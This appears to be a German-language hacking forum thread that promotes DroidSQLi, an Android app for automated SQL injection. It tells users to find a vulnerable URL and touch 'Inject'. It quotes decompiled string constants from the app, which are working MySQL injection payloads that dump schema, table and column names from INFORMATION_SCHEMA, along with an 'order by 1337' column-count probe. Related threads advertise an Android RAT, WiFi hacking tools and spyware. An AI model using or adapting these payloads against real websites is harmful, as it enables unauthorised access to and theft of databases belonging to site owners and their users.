[info]
DroidSQLi
Information
Hinweis
- Time based Injection
- Blind Injection
- Error based Injection
- Normal Injection
AV Scan
- All you need to do is find a vulnerable url and put it on Target URL and touch Inject

[info]
DroidSQLi
Information
Hinweis
- Time based Injection
- Blind Injection
- Error based Injection
- Normal Injection
AV Scan
- All you need to do is find a vulnerable url and put it on Target URL and touch Inject
Thanked by 1 Member:
|
|
Thanked by 2 Members:
|
|
const-string v9, "select+concat(group_concat(0x6868,r,0x6a6a,hex(cast(q+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+hex(cast(TABLE_SCHEMA+as+char))r,count(TABLE_NAME)q+from+INFORMATION_SCHEMA.tables+group+by+r{limit})x" const-string v9, "select+concat(group_concat(0x6868,hex(cast(n+as+char)),0x6a6a,0x3331,0x6868+order+by+n+separator+0x6767),0x69)from(select+COLUMN_NAME+n+from+information_schema.columns+where+TABLE_SCHEMA=0x" const-string v9, "order+by+n{limit}" const-string v12, "select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x" const-string v12, "order+by+r{limit}" const-string v28, "select+concat(group_concat(0x6868,r,0x6a6a,hex(cast(q+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+hex(cast(concat(" const-string v8, ".*Unknown column '1337' in 'order clause'.*" const-string v14, "+order+by+1337--+"
.method public setParent(Ljava/lang/Object;Landroid/view/View;I)V .locals 0 .parameter "info" .parameter "root" .parameter "virtualDescendantId"
Thema | Forum | Themenstarter | Statistik | Letzter Beitrag | |
---|---|---|---|---|---|
[Android RAT] Cypher RAT![]() |
Mobile | mantwohouse |
|
![]()
|
|
Android WiFi Hacks & Tools //update 04.05.15![]() ![]() ![]() ![]() ![]() |
Mobile | ChiLLiN |
|
![]()
|
|
AdoBot | Android Spyware Bot + Panel |
Mobile | PaulaAbdul |
|
![]()
|
Mitglieder: , Gäste: , unsichtbare Mitglieder: